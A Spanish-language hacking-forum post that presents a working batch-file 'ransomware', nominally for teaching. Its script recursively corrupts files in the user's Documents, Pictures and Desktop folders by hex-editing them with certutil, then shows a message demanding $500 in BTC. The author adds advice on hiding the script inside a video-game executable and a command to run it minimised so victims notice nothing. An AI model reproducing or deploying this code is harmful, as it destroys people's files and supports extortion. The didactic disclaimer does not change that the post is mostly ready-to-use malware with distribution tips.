Publicado el 23/07/2023 12:07:00 en Hacking General.
Author: l0ve | Total de votos: 5   Vote

Este un ejemplo de lo que no se tiene que hacer tanto como en código como en términos legales ... pero a modo de demostración y fines didácticos podemos crear un .bat que actue en forma de "ransomware".


Como saben los ransomware tienen una modalidad particular que es codificar los archivos de un usuario para dejarlos inutilizables y pedir un rescate por ellos, actualmente es uno de los problemas cómunes que se enfrentan los usuarios ... todo depende de programas de detección para su prevención.

La encriptación de archivos puede ser de varias modalidades, utilizando diferentes algoritmos algo que escapa a este post. Pero acá vamos a recrear algo parecido y aunque no codifica archivos directamente puede ser muy engorroso arreglarlo y por eso podría considerarse un ransomware.

por favor utilizenlo con fines didácticos ya que es muy peligroso y sujeto a muchos problemas legales, mi intención es solo demostrar que con algúnas líneas de código se puede lograr algo parecido.


Hay varias herramientas que podrían hacer lo mismo en una sola línea de código pero veamos de que se trata:


Como saben los archivos contienen datos binarios solo entendibles para la pc, pero también existe el hexadecimal que es un sistema numérico pero en base 16 que permite reducir largas cadenas a una más cortas.

La idea es que sabiendo esto podamos modificar una serie de bytes comúnes de un archivo(s) para poner unos propios y así sobreescribir los valores por unos especificos ...

Como no podemos mayormente con .bat hacer esto con ayuda de certutil.exe un programa de Microsoft relacionado a certificados y seguridad incorporado por defecto en windows podemos leer y escribir archivos .hex.

Lo que vamos a hacer es leer un archivo, pasarlo a .hex con certutil, luego a ese archivo temporal modificarlo con batch línea a línea y luego volver a empaquetar a un binario que va a sobreescribir el archivo original modificando una serie de byte que especifiquemos.

con esto logramos crear archivos corruptos dificiles de decodificar que sin un conocimiento de hex y archivos da un potencial ransomware.

Solo es una idea básica pero como pueden ver algo así puede ser muy peligroso.

Acá el código:

@echo off
setlocal enabledelayedexpansion

:: Cambiamos un PNG por CC CC CC
set "byte=50 4E 47"
set "reemplazo=CC CC CC"

:: Lista de carpetas a procesar
set "carpetas=%USERPROFILE%/Documents %USERPROFILE%/Pictures %USERPROFILE%/Desktop"

for %%d in (%carpetas%) do (
    pushd "%%d"
    for /r %%f in (*) do (
        set "archivo=%%~nxf"
        set "tempfile=%TEMP%!archivo!.hex"

        certutil -f -encodehex "%%f" "!tempfile!" >nul

        (for /f "usebackq tokens=*" %%a in ("!tempfile!") do (
            set "linea=%%a"
            setlocal enabledelayedexpansion
            set "primeros4=!linea:~0,4!"
            set "linea=!linea:~4!"
            set "linea=!linea:%byte%=%reemplazo%!"
            echo !primeros4!!linea!
            endlocal
        )) > "!tempfile!.tmp"

        certutil -f -decodehex "!tempfile!.tmp" "%%f" >nul

        del "!tempfile!" >nul
        del "!tempfile!.tmp" >nul
    )
    popd
)

rundll32.exe Kernel32.dll,Beep 750,300
msg "%username%" Pay to decode files: [email protected] $500 BTC, contact for info.

lo que hace el código es leer carpetas del usuarios comúnes y modificar recursivamente los archivos incluyendo los subdirectorios .. el código es muy lento y poco práctico pero cualquiera podría agregarlo a junto a un .exe de algún videojuegos en un link y cuando el usuario abra el juego no notara nada, hasta que sea demasiado tarde ...

para hacer que un .bat se ejecute silenciosamente se usa:

START /MIN CMD.EXE /C example.bat